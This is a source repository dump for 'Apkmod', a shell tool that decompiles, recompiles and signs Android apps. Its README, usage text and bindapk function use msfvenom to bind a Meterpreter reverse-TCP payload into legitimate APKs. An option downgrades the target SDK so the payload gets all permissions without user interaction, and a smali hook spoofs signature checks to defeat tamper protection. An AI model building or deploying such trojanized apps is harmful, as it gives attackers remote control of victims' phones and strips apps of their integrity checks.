├── .github └── ISSUE_TEMPLATE │ └── bug_report.md ├── CHANGELOG.md ├── LICENSE ├── README.md ├── apkmod.p12 ├── apkmod.sh ├── hooks ├── hook.smali ├── hook2.dex └── hook2.smali ├── scripts ├── TermuxAlpine.sh ├── apk.rb ├── apktool_alpine.sh ├── apktool_termux.sh ├── finaltouchup.sh ├── jadx_alpine.sh ├── jadx_termux.sh ├── signapk_alpine.sh ├── signapk_termux.sh └── signkill.sh ├── setup.sh └── signkill.jar /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | 5 | --- 6 | 7 | 8 | 9 | **Problem description** 10 | A clear and concise description of what the problem is. You may post screenshots in addition to description. 11 | 12 | **Steps to reproduce** 13 | Steps to reproduce the behavior. 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Attach Original __Apk__ file. 22 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## [1.1] 2 | ### Added 3 | - Added Update() for auto-update 4 | 5 | ## [1.2] 6 | ### Added 7 | - extra flag or option `-a` to use __aapt2__ instead of __aapt__. 8 | - Issue template 9 | ### Changed 10 | - use getopts for parameters handling 11 | ### Fixed 12 | - fix update() 13 | 14 | ## [1.3] 15 | ### Added 16 | - add aapt2 to bind() 17 | ### Fixed 18 | - set `LD_LIBRARY_PATH` to avoid libraries access from termux i.e `$PREFIX/lib` 19 | 20 | ## [1.4] 21 | ### Added 22 | - patched binaries of aapt2 to skip invalid names while recompiling 23 | ### Fixed 24 | - fixes #10 25 | 26 | ## [1.5] 27 | ### Changed 28 | - stick to alpine v3.10.2 instead of latest one 29 | 30 | ## [1.6] 31 | ### Added 32 | - custom path of framework directory 33 | - new flag `-V` to enable verbose mode for decompiling & recompiling only 34 | ### Changed 35 | - update apktool to 2.4.1 36 | - remove framework app __1.apk__ after each decompiling 37 | 38 | ## [1.7] 39 | ### Added 40 | - new option `--no-res` to decompile app except resources. 41 | - new option `--no-smali` to prevent disassembly of the dex file(s) 42 | 43 | ## [1.8] 44 | ### Added 45 | - new option `--no-assets` to prevent decoding of unknown assets files 46 | - `-z` for zipalign 47 | - `--frame-path` to specify framework directory 48 | - `-R` recompile + sign 49 | 50 | ## [1.9] 51 | ### Added 52 | - new option `--enable-perm` to enable all permissions automatically in binded or non binded payloads 53 | 54 | ## [2.0] 55 | ### Added 56 | - Kali support 57 | ### Changed 58 | - remove option `-a` & defaults to `aapt2` 59 | 60 | ## [2.1] 61 | ### Added 62 | - jadx support 63 | - new option `--to-java` to decode [dex,apk,zip] to java sources 64 | - `--deobf` can use along with `--to-java` 65 | 66 | ## [2.2] 67 | ### Changed 68 | - now apksigner in termux is from sdk so a key ( PKCS12 ) is added. 69 | 70 | ## [3.0] 71 | ### Added 72 | - introducing `-a` option again but now for `aapt` 73 | - new option `--appname` for change App name 74 | ### Changed 75 | - update aapt2 for Android 11 76 | 77 | ## [3.1] 78 | ### Changed 79 | - update apktool to 2.5.0 80 | 81 | ## [4.1] 82 | ### Changed 83 | - update jadx to 1.3.2 84 | - use custom apktool 85 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. 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But first, please read 674 | . -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Apkmod v4.1 2 | ### Author : Lokesh @Hax4us 3 | 4 | ## _Steps For Installation_ 5 | 1. First goto home directory `cd $HOME` 6 | 2. Get the setup script `wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh` 7 | 3. Execute the script `bash setup.sh` 8 | 4. Now you can execute command `apkmod` 9 | 10 | ## Usage : 11 | 1. For decompiling `apkmod -d -i /path/to/inapp.apk -o /path/to/outdirectory`. It will decompile __inapp.apk__ into __outdirectory__ folder. 12 | 2. For recompiling `apkmod -r -i /path/to/indirectory -o /path/to/outapp.apk`. It will recompile __indirectory__ ( where decompiled files are exists ) into __outapp.apk__. 13 | 3. For signing `apkmod -s -i /path/to/unsignedapp.apk -o /path/to/signedapp.apk`. It will sign __unsignedapp.apk__ and saves output ( signed app ) to __signedapp.apk__. 14 | 4. For binding `apkmod -b -i /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444`. It will bind payload with __originalApp.apk__ and saves final binded app to __binded.apk__. 15 | 5. Use `-V` to enable verbose output 16 | 6. If only editing Java (smali) then this is the recommended action for faster decompile & rebuild `--no-res` 17 | 7. If you are only editing the resources. This is the recommended action for faster disassemble & assemble `--no-smali` 18 | 8. use `--frame-path` to specify framework directory like `--frame-path=/path/to/dir` 19 | 9. Use `--enable-perm` to enable all android permissions in binded or non binded payloads without user interaction. For example :- `apkmod --enable-perm -i /path/to/binded.apk -o mybinded.apk` 20 | 10. `apkmod --to-java -i /path/to/in.apk -o outfolder` will decompile dex to java. Input can be __[.apk,.dex,.zip]__ 21 | 11. Now you can use a optional option `-a` to use __aapt__ for __binding__ and __recompiling__. Why aapt ? Because some apps can't recompile with __aapt2__ but __aapt__ can do it. But I can't drop __aapt2__ support because some apps can't recompile with __aapt__ so first recompile or bind without __aapt__ (`-a`) then if you failed then try with __aapt__. For example `apkmod -a -b -i /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444` will use `aapt` otherwise `aapt2`. 22 | 12. To change App name use `--appname` with `-i`. For example `apkmod --appname="New App Name" -i /path/to/in.apk -o /path/to/out.apk` 23 | 13. To remove/kill signature verification of app , `apkmod --signature-bypass --killer=k2 -i /path/to/in.apk -o /path/to/out.apk`. There are two version available of signature killer , one is k1 and second one is k2, you will have to specify version like `--killer=k1` or `--killer=k2`. 24 | ### Size Comparision (Termux) 25 | Size  | Apkmod  | Third party tools 26 | --- | --- | --- 27 | after installation | Around 100 MB | Around 700-900 MB 28 | 29 | #### Why Apkmod is extremely small ? 30 | Because it has Alpine instead of Ubuntu, kali, parrot or other glibc based distros. 31 | 32 | #### You can join me on telegram also 33 | https://t.me/hax4us_group 34 | -------------------------------------------------------------------------------- /apkmod.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hax4us/Apkmod/42d3aaac87dce9d3285150172acf2e75a02d7a2f/apkmod.p12 -------------------------------------------------------------------------------- /apkmod.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | ######################################## 4 | # Project : Apkmod # 5 | # Author : Lokesh @Hax4us # 6 | # Email : lkpandey950@gmail.com # 7 | ######################################## 8 | 9 | unset _JAVA_OPTIONS 10 | CWD=$(pwd) 11 | VERSION="4.0" 12 | #AAPT="" 13 | 14 | #colors 15 | cyan='\033[1;36m' 16 | green='\033[1;32m' 17 | red='\033[1;31m' 18 | yellow='\033[1;33m' 19 | blue='\033[1;34m' 20 | purple='\033[1;35m' 21 | reset='\033[0m' 22 | 23 | usage() { 24 | printf "${yellow}Usage: apkmod [option] [/path/to/input.apk] -o [/path/to/output.apk] [EXTRAARGS] 25 | ${purple}valid options are:${blue} 26 | -v print version 27 | -a use aapt instead of aapt2 28 | -d For decompiling 29 | -r For recompiling 30 | -R recompile + sign 31 | -s For signing 32 | -b For binding payload 33 | -i Specify input file or directory 34 | -o Specify output file or directory 35 | -V verbose output 36 | -z for zipalign 37 | --appname change app name 38 | --no-res prevents decompiling of resources 39 | --no-smali prevents dessambly of dex files 40 | --no-assets prevents decoding of unknown assets file 41 | --frame-path The folder location where framework files should be stored/read from 42 | --enable-perm Enable all permissions in binded payload 43 | --to-java Decode [dex,apk,zip] to java 44 | --deobf Can use along with --to-java for obfuscated code 45 | --signature-bypass Bypass signature verification 46 | 47 | ${yellow}Example: 48 | ${blue}apkmod -b -i /sdcard/apps/play.apk -o /sdcard/apps/binded_play.apk LHOST=127.0.0.1 LPORT=4444 49 | ${purple}bind the payload with play.apk and saves output in given directory. 50 | 51 | ${green}Apkmod is like a bridge between your termux and 52 | alpine by which you can easily decompile recompile signapk and 53 | even bind the payload using metasploit\n${reset}" 54 | } 55 | 56 | change_appname() { 57 | tmp_dir=$(mktemp -d) 58 | decompile ${1} ${tmp_dir} --no-src --no-assets 59 | sed -i -e "0,/android:label.* / s/android:label.* /android:label=\"$APPNAME\" /" ${tmp_dir}/AndroidManifest.xml 60 | recompile ${tmp_dir} ${2} 61 | rm -r ${tmp_dir} 62 | print_status "Done" 63 | } 64 | 65 | enable_perm() { 66 | tmp_dir=$(mktemp -d) 67 | decompile ${1} ${tmp_dir} --no-src --no-assets 68 | for i in minSdkVersion targetSdkVersion; do 69 | sed -i "s/$i.*/$i: '22'/" $tmp_dir/apktool.yml 70 | done 71 | recompile ${tmp_dir} ${2} 72 | signApk ${2} $TMPDIR/temp.apk 73 | mv $TMPDIR/temp.apk ${2} 74 | rm -r $tmp_dir 75 | print_status "Done" 76 | } 77 | 78 | error_msg() { 79 | printf "${red}[!] ${yellow}${1}${reset}\n" 80 | } 81 | 82 | print_status() { 83 | printf "${blue}[*] ${green}${1}\n${reset}" 84 | } 85 | 86 | file_exist() { 87 | if [ ! -e "${1}" ]; then 88 | error_msg "file (${1}) does not exist" 89 | exit 1 90 | fi 91 | } 92 | 93 | dir_exist() { 94 | if [ ! -d "${1}" ]; then 95 | error_msg "directory (${1}) does not exist" 96 | exit 1 97 | fi 98 | } 99 | 100 | decompile() { 101 | local vbs_arg="" 102 | print_status "Decompiling ${1}" 103 | if [ "${VERBOSE}" = "yes" ]; then 104 | vbs_arg="-v" 105 | fi 106 | apktool ${FORCE_DELETE} ${NO_ASSETS} ${NO_RES} ${NO_SMALI} ${vbs_arg} d ${3} ${1} -o ${2} -p ${FRAMEPATH:-$HOME/.apkmod/framework} 107 | rm -f $HOME/.apkmod/framework/1.apk 108 | if [ ! -e ${2} ]; then 109 | error_msg "Can't decompile, take screenshot and open a issue on github" 110 | exit 1 111 | fi 112 | print_status "Decompiled into ${2}" 113 | } 114 | 115 | recompile() { 116 | local vbs_arg="" 117 | print_status "Recompiling ${1}" 118 | if [ "${VERBOSE}" = "yes" ]; then 119 | vbs_arg="-v" 120 | fi 121 | 122 | if [ "${USE_AAPT}" = "yes" ]; then 123 | AAPT=" -a /usr/bin/aapt" 124 | else 125 | AAPT="-a /usr/bin/aapt2" 126 | fi 127 | 128 | apktool ${vbs_arg} b $AAPT -o ${2} ${1} -p ${FRAMEPATH:-$HOME/.apkmod/framework} 129 | if [ ! -e ${2} ]; then 130 | error_msg "Try again with -a option\nBut if still can't recompile, take screenshot and open a issue on github" 131 | exit 1 132 | fi 133 | print_status "Recompiled to ${2}" 134 | if [ "${IS_SIGN}" = "yes" ]; then 135 | signApk ${2} ${2%.*}_signed.apk 136 | fi 137 | } 138 | 139 | signApk() { 140 | print_status "Signing ${1}" 141 | 142 | apksigner sign --in $1 --out $2 --ks-type PKCS12 --ks ~/.apkmod/apkmod.p12 --ks-pass pass:apkmod 143 | #signapk -signedjar $2 -storepass hax4us -sigalg SHA1withRSA -digestalg SHA1 -keystore \$HOME/apkmod.keystore $1 hax4us 144 | 145 | if [ ! -e ${2} ]; then 146 | error_msg "Can't sign, take screenshot and open a issue on github" 147 | exit 1 148 | fi 149 | 150 | print_status "Signed Successfully" 151 | } 152 | 153 | ######################### 154 | # Bind payload with APK # 155 | ######################### 156 | 157 | bindapk() { 158 | print_status "Binding ${3}" 159 | 160 | if [ "${USE_AAPT}" = "yes" ]; then 161 | aapt_arg="--use-aapt" 162 | fi 163 | 164 | rm -f $HOME/.apkmod/framework/1.apk 165 | 166 | msfvenom -x ${3} -p android/meterpreter/reverse_tcp LHOST=${1} LPORT=${2} --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true ${aapt_arg} -o ${4} 167 | 168 | if [ ! -e ${4} ]; then 169 | error_msg "Try again with option -a\n, but if still can't bind then take screenshot and open a issue on github" 170 | exit 1 171 | fi 172 | print_status "Binded to ${4}" 173 | } 174 | 175 | zipAlign() { 176 | print_status "Note : never use zipalign with signed APK" 177 | print_status "aligning APK..." 178 | zipalign -f 4 ${1} ${2} 179 | if [ ! -e ${4} ]; then 180 | error_msg "can't align APK" 181 | exit 1 182 | fi 183 | print_status "aligned successfully" 184 | } 185 | 186 | dextojava() { 187 | print_status "Decoding started..." 188 | jadx -d $2 $1 $DEOBF $NO_RES $NO_SRC 189 | } 190 | 191 | signature_bypass() { 192 | print_status "Killing signature..." 193 | signkill --killer $SIGNATURE_KILLER -i $1 -o $2 194 | } 195 | 196 | ######################### 197 | # Validate User's input # 198 | ######################### 199 | 200 | validate_input() { 201 | if [ ! "${2}" ]; then 202 | print_status "-i parameter missing, no input specified" 203 | exit 1 204 | fi 205 | 206 | if [ "${1}" = "-b" ]; then 207 | if [ "$#" -ne 5 ]; then 208 | usage 209 | exit 1 210 | fi 211 | file_exist "${2}" 212 | dir_exist "${3%\/*}" 213 | fi 214 | #if [ ! "${1}" = "-b" -a "$#" -ne 4 ]; then 215 | # usage 216 | # exit 1 217 | #fi 218 | 219 | if [ "${1}" = "-d" -o "${1}" = "-s" -o "${1}" = "--enable-perm" -o "$1" = "-d2j" -o "$1" = "--appname" -o "${1}" = "--signature-bypass" ]; then 220 | file_exist "${2}" 221 | dir_exist "${3%\/*}" 222 | fi 223 | 224 | if [ "${1}" = "-r" ]; then 225 | dir_exist "${2}" 226 | dir_exist "${3%\/*}" 227 | fi 228 | 229 | if [ "${1}" = "--signature-bypass" ]; then 230 | if [ ! "$SIGNATURE_KILLER" ]; then 231 | print_status "--killer value can't be empty" 232 | exit 1 233 | fi 234 | fi 235 | } 236 | 237 | ############################### 238 | # do automatic update check & # 239 | # ask for update if available # 240 | ############################### 241 | 242 | update() { 243 | temp=$(curl -L -s https://github.com/Hax4us/Apkmod/raw/master/apkmod.sh | grep -w "VERSION=" | head -n1) 244 | N_VERSION=$(echo ${temp} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1) 245 | if [ "${1}" != "-u" ]; then 246 | [ 1 -eq $(echo "${N_VERSION} != ${VERSION}" | bc -l) ] && print_status "Update is available, run [ apkmod -u ] for update" && exit 1 247 | fi 248 | if [ "${1}" = "-u" ]; then 249 | rm -f setup.sh 250 | if [ "$2" = "--with-alpine" ]; then 251 | ARGS=$2 252 | else 253 | ARGS=--without-alpine 254 | fi 255 | wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh && bash setup.sh $ARGS 256 | fi 257 | } 258 | 259 | ############## 260 | # MAIN # 261 | ############## 262 | 263 | # check for update only if net is ON 264 | wget -q --spider http://google.com 265 | if [ $? -eq 0 -a ! "${1}" = "-u" ]; then 266 | update 267 | fi 268 | 269 | if [ $# -eq 0 ]; then 270 | usage 271 | exit 1 272 | fi 273 | 274 | while getopts ":z:drsbo:i:ahvuVR-:f" opt; do 275 | case $opt in 276 | a) 277 | USE_AAPT="yes" 278 | ;; 279 | d) 280 | ACTION="decompile" 281 | ARG="-d" 282 | ;; 283 | r) 284 | ACTION="recompile" 285 | ARG="-r" 286 | ;; 287 | s) 288 | ACTION="signApk" 289 | ARG="-s" 290 | ;; 291 | b) 292 | ACTION="bindapk" 293 | ARG="-b" 294 | LHOST=$(echo "$@" | sed -e "s/ /\\n/g" | grep -i LHOST | cut -d "=" -f2) 295 | LPORT=$(echo "$@" | sed -e "s/ /\\n/g" | grep -i LPORT | cut -d "=" -f2) 296 | ;; 297 | i) 298 | in_abs_path=$(readlink -m ${OPTARG}) 299 | ;; 300 | o) 301 | out_abs_path=$(readlink -m ${OPTARG}) 302 | ;; 303 | h) 304 | usage 305 | exit 0 306 | ;; 307 | v) 308 | printf "${yellow}${VERSION}\n${reset}" 309 | exit 0 310 | ;; 311 | u) 312 | print_status "Updating ..." 313 | update "-${opt}" "$2" 314 | print_status "Update completed" 315 | exit 0 316 | ;; 317 | V) 318 | VERBOSE="yes" 319 | ;; 320 | -) 321 | case $OPTARG in 322 | no-res) 323 | NO_RES="--no-res " 324 | ;; 325 | no-smali) 326 | NO_SMALI="--no-src" 327 | ;; 328 | no-assets) 329 | NO_ASSETS="--no-assets" 330 | ;; 331 | frame-path*) 332 | FRAMEPATH="${OPTARG#*=}" 333 | ;; 334 | enable-perm*) 335 | ACTION="enable_perm" 336 | ARG="--enable-perm" 337 | ;; 338 | deobf) 339 | DEOBF="--deobf" 340 | ;; 341 | to-java*) 342 | ACTION="dextojava" 343 | ARG="-d2j" 344 | ;; 345 | appname*) 346 | ACTION="change_appname" 347 | ARG="--appname" 348 | APPNAME="${OPTARG#*=}" 349 | ;; 350 | signature-bypass) 351 | ACTION="signature_bypass" 352 | ARG="--signature-bypass" 353 | SIGNATURE_KILLER=$(echo "$@" | sed -e "s/ /\\n/g" | grep "\--killer" | cut -d "=" -f2) 354 | ;; 355 | esac 356 | ;; 357 | 358 | i) 359 | in_abs_path=$(readlink -m ${OPTARG}) 360 | ;; 361 | R) 362 | ACTION="recompile" 363 | ARG="-r" 364 | in_abs_path=$(readlink -m ${OPTARG}) 365 | IS_SIGN="yes" 366 | ;; 367 | z) 368 | ACTION="zipAlign" 369 | ARG="-z" 370 | in_abs_path=$(readlink -m ${OPTARG}) 371 | ;; 372 | \?) 373 | error_msg "Invalid option: -$OPTARG" 374 | exit 1 375 | ;; 376 | f) 377 | FORCE_DELETE="-f" 378 | ;; 379 | :) 380 | error_msg "option -$OPTARG requires an argument" 381 | exit 1 382 | ;; 383 | esac 384 | done 385 | 386 | ## Lets validate user's input 387 | if [ "${ARG}" = "-d" ]; then 388 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} 389 | elif [ "${ARG}" = "-r" ]; then 390 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} 391 | elif [ "${ARG}" = "-s" ]; then 392 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} 393 | elif [ "${ARG}" = "-b" ]; then 394 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} ${LHOST} ${LPORT} 395 | elif [ "${ARG}" = "-z" ]; then 396 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} 397 | elif [ "${ARG}" = "--enable-perm" ]; then 398 | validate_input ${ARG} ${in_abs_path} ${out_abs_path} 399 | elif [ "$ARG" = "-d2j" ]; then 400 | validate_input $ARG $in_abs_path $out_abs_path 401 | elif [ "$ARG" = "--appname" ]; then 402 | validate_input $ARG $in_abs_path $out_abs_path 403 | elif [ "$ARG" = "--signature-bypass" ]; then 404 | validate_input $ARG $in_abs_path $out_abs_path 405 | fi 406 | 407 | ## Lhost or lport will be ignored for all actions except bindapk 408 | ${ACTION} ${LHOST} ${LPORT} ${in_abs_path} ${out_abs_path} ${NO_RES} ${NO_SMALI} ${NO_ASSETS} ${FORCE_DELETE} 409 | -------------------------------------------------------------------------------- /hooks/hook.smali: -------------------------------------------------------------------------------- 1 | .class public Lcc/binmt/signature/PmsHookApplication; 2 | .super Landroid/app/Application; 3 | .source "PmsHookApplication.java" 4 | 5 | # interfaces 6 | .implements Ljava/lang/reflect/InvocationHandler; 7 | 8 | 9 | # static fields 10 | .field private static final GET_SIGNATURES:I = 0x40 11 | 12 | 13 | # instance fields 14 | .field private appPkgName:Ljava/lang/String; 15 | 16 | .field private base:Ljava/lang/Object; 17 | 18 | .field private sign:[[B 19 | 20 | 21 | # direct methods 22 | .method public constructor ()V 23 | .registers 2 24 | 25 | .prologue 26 | .line 20 27 | invoke-direct {p0}, Landroid/app/Application;->()V 28 | 29 | .line 25 30 | const-string/jumbo v0, "" 31 | 32 | iput-object v0, p0, Lcc/binmt/signature/PmsHookApplication;->appPkgName:Ljava/lang/String; 33 | 34 | return-void 35 | .end method 36 | 37 | .method private hook(Landroid/content/Context;)V 38 | .registers 22 39 | .param p1, "context" # Landroid/content/Context; 40 | 41 | .prologue 42 | .line 52 43 | :try_start_0 44 | const-string/jumbo v6, "### Signatures Data ###" 45 | 46 | .line 53 47 | .local v6, "data":Ljava/lang/String; 48 | new-instance v10, Ljava/io/DataInputStream; 49 | 50 | new-instance v17, Ljava/io/ByteArrayInputStream; 51 | 52 | const/16 v18, 0x0 53 | 54 | move/from16 v0, v18 55 | 56 | invoke-static {v6, v0}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B 57 | 58 | move-result-object v18 59 | 60 | invoke-direct/range {v17 .. v18}, Ljava/io/ByteArrayInputStream;->([B)V 61 | 62 | move-object/from16 v0, v17 63 | 64 | invoke-direct {v10, v0}, Ljava/io/DataInputStream;->(Ljava/io/InputStream;)V 65 | 66 | .line 54 67 | .local v10, "is":Ljava/io/DataInputStream; 68 | invoke-virtual {v10}, Ljava/io/DataInputStream;->read()I 69 | 70 | move-result v17 71 | 72 | move/from16 v0, v17 73 | 74 | and-int/lit16 v0, v0, 0xff 75 | 76 | move/from16 v17, v0 77 | 78 | move/from16 v0, v17 79 | 80 | new-array v0, v0, [[B 81 | 82 | move-object/from16 v16, v0 83 | 84 | .line 55 85 | .local v16, "sign":[[B 86 | const/4 v8, 0x0 87 | 88 | .local v8, "i":I 89 | :goto_28 90 | move-object/from16 v0, v16 91 | 92 | array-length v0, v0 93 | 94 | move/from16 v17, v0 95 | 96 | move/from16 v0, v17 97 | 98 | if-ge v8, v0, :cond_47 99 | 100 | .line 56 101 | invoke-virtual {v10}, Ljava/io/DataInputStream;->readInt()I 102 | 103 | move-result v17 104 | 105 | move/from16 v0, v17 106 | 107 | new-array v0, v0, [B 108 | 109 | move-object/from16 v17, v0 110 | 111 | aput-object v17, v16, v8 112 | 113 | .line 57 114 | aget-object v17, v16, v8 115 | 116 | move-object/from16 v0, v17 117 | 118 | invoke-virtual {v10, v0}, Ljava/io/DataInputStream;->readFully([B)V 119 | 120 | .line 55 121 | add-int/lit8 v8, v8, 0x1 122 | 123 | goto :goto_28 124 | 125 | .line 61 126 | :cond_47 127 | const-string/jumbo v17, "android.app.ActivityThread" 128 | 129 | invoke-static/range {v17 .. v17}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class; 130 | 131 | move-result-object v3 132 | 133 | .line 62 134 | .local v3, "activityThreadClass":Ljava/lang/Class;, "Ljava/lang/Class<*>;" 135 | const-string/jumbo v17, "currentActivityThread" 136 | 137 | const/16 v18, 0x0 138 | 139 | move/from16 v0, v18 140 | 141 | new-array v0, v0, [Ljava/lang/Class; 142 | 143 | move-object/from16 v18, v0 144 | 145 | .line 63 146 | move-object/from16 v0, v17 147 | 148 | move-object/from16 v1, v18 149 | 150 | invoke-virtual {v3, v0, v1}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 151 | 152 | move-result-object v5 153 | 154 | .line 64 155 | .local v5, "currentActivityThreadMethod":Ljava/lang/reflect/Method; 156 | const/16 v17, 0x0 157 | 158 | const/16 v18, 0x0 159 | 160 | move/from16 v0, v18 161 | 162 | new-array v0, v0, [Ljava/lang/Object; 163 | 164 | move-object/from16 v18, v0 165 | 166 | move-object/from16 v0, v17 167 | 168 | move-object/from16 v1, v18 169 | 170 | invoke-virtual {v5, v0, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 171 | 172 | move-result-object v4 173 | 174 | .line 67 175 | .local v4, "currentActivityThread":Ljava/lang/Object; 176 | const-string/jumbo v17, "sPackageManager" 177 | 178 | move-object/from16 v0, v17 179 | 180 | invoke-virtual {v3, v0}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field; 181 | 182 | move-result-object v15 183 | 184 | .line 68 185 | .local v15, "sPackageManagerField":Ljava/lang/reflect/Field; 186 | const/16 v17, 0x1 187 | 188 | move/from16 v0, v17 189 | 190 | invoke-virtual {v15, v0}, Ljava/lang/reflect/Field;->setAccessible(Z)V 191 | 192 | .line 69 193 | invoke-virtual {v15, v4}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object; 194 | 195 | move-result-object v14 196 | 197 | .line 72 198 | .local v14, "sPackageManager":Ljava/lang/Object; 199 | const-string/jumbo v17, "android.content.pm.IPackageManager" 200 | 201 | invoke-static/range {v17 .. v17}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class; 202 | 203 | move-result-object v9 204 | 205 | .line 73 206 | .local v9, "iPackageManagerInterface":Ljava/lang/Class;, "Ljava/lang/Class<*>;" 207 | move-object/from16 v0, p0 208 | 209 | iput-object v14, v0, Lcc/binmt/signature/PmsHookApplication;->base:Ljava/lang/Object; 210 | 211 | .line 74 212 | move-object/from16 v0, v16 213 | 214 | move-object/from16 v1, p0 215 | 216 | iput-object v0, v1, Lcc/binmt/signature/PmsHookApplication;->sign:[[B 217 | 218 | .line 75 219 | invoke-virtual/range {p1 .. p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String; 220 | 221 | move-result-object v17 222 | 223 | move-object/from16 v0, v17 224 | 225 | move-object/from16 v1, p0 226 | 227 | iput-object v0, v1, Lcc/binmt/signature/PmsHookApplication;->appPkgName:Ljava/lang/String; 228 | 229 | .line 78 230 | invoke-virtual {v9}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader; 231 | 232 | move-result-object v17 233 | 234 | const/16 v18, 0x1 235 | 236 | move/from16 v0, v18 237 | 238 | new-array v0, v0, [Ljava/lang/Class; 239 | 240 | move-object/from16 v18, v0 241 | 242 | const/16 v19, 0x0 243 | 244 | aput-object v9, v18, v19 245 | 246 | .line 77 247 | move-object/from16 v0, v17 248 | 249 | move-object/from16 v1, v18 250 | 251 | move-object/from16 v2, p0 252 | 253 | invoke-static {v0, v1, v2}, Ljava/lang/reflect/Proxy;->newProxyInstance(Ljava/lang/ClassLoader;[Ljava/lang/Class;Ljava/lang/reflect/InvocationHandler;)Ljava/lang/Object; 254 | 255 | move-result-object v13 256 | 257 | .line 83 258 | .local v13, "proxy":Ljava/lang/Object; 259 | invoke-virtual {v15, v4, v13}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V 260 | 261 | .line 86 262 | invoke-virtual/range {p1 .. p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager; 263 | 264 | move-result-object v12 265 | 266 | .line 87 267 | .local v12, "pm":Landroid/content/pm/PackageManager; 268 | invoke-virtual {v12}, Ljava/lang/Object;->getClass()Ljava/lang/Class; 269 | 270 | move-result-object v17 271 | 272 | const-string/jumbo v18, "mPM" 273 | 274 | invoke-virtual/range {v17 .. v18}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field; 275 | 276 | move-result-object v11 277 | 278 | .line 88 279 | .local v11, "mPmField":Ljava/lang/reflect/Field; 280 | const/16 v17, 0x1 281 | 282 | move/from16 v0, v17 283 | 284 | invoke-virtual {v11, v0}, Ljava/lang/reflect/Field;->setAccessible(Z)V 285 | 286 | .line 89 287 | invoke-virtual {v11, v12, v13}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V 288 | 289 | .line 90 290 | sget-object v17, Ljava/lang/System;->out:Ljava/io/PrintStream; 291 | 292 | const-string/jumbo v18, "PmsHook success." 293 | 294 | invoke-virtual/range {v17 .. v18}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V 295 | :try_end_e0 296 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_e0} :catch_e1 297 | 298 | .line 95 299 | .end local v3 # "activityThreadClass":Ljava/lang/Class;, "Ljava/lang/Class<*>;" 300 | .end local v4 # "currentActivityThread":Ljava/lang/Object; 301 | .end local v5 # "currentActivityThreadMethod":Ljava/lang/reflect/Method; 302 | .end local v6 # "data":Ljava/lang/String; 303 | .end local v8 # "i":I 304 | .end local v9 # "iPackageManagerInterface":Ljava/lang/Class;, "Ljava/lang/Class<*>;" 305 | .end local v10 # "is":Ljava/io/DataInputStream; 306 | .end local v11 # "mPmField":Ljava/lang/reflect/Field; 307 | .end local v12 # "pm":Landroid/content/pm/PackageManager; 308 | .end local v13 # "proxy":Ljava/lang/Object; 309 | .end local v14 # "sPackageManager":Ljava/lang/Object; 310 | .end local v15 # "sPackageManagerField":Ljava/lang/reflect/Field; 311 | .end local v16 # "sign":[[B 312 | :goto_e0 313 | return-void 314 | 315 | .line 91 316 | :catch_e1 317 | move-exception v7 318 | 319 | .line 92 320 | .local v7, "e":Ljava/lang/Exception; 321 | sget-object v17, Ljava/lang/System;->err:Ljava/io/PrintStream; 322 | 323 | const-string/jumbo v18, "PmsHook failed." 324 | 325 | invoke-virtual/range {v17 .. v18}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V 326 | 327 | .line 93 328 | invoke-virtual {v7}, Ljava/lang/Exception;->printStackTrace()V 329 | 330 | goto :goto_e0 331 | .end method 332 | 333 | 334 | # virtual methods 335 | .method protected attachBaseContext(Landroid/content/Context;)V 336 | .registers 2 337 | .param p1, "base" # Landroid/content/Context; 338 | 339 | .prologue 340 | .line 29 341 | invoke-direct {p0, p1}, Lcc/binmt/signature/PmsHookApplication;->hook(Landroid/content/Context;)V 342 | 343 | .line 30 344 | invoke-super {p0, p1}, Landroid/app/Application;->attachBaseContext(Landroid/content/Context;)V 345 | 346 | .line 31 347 | return-void 348 | .end method 349 | 350 | .method public invoke(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object; 351 | .registers 11 352 | .param p1, "proxy" # 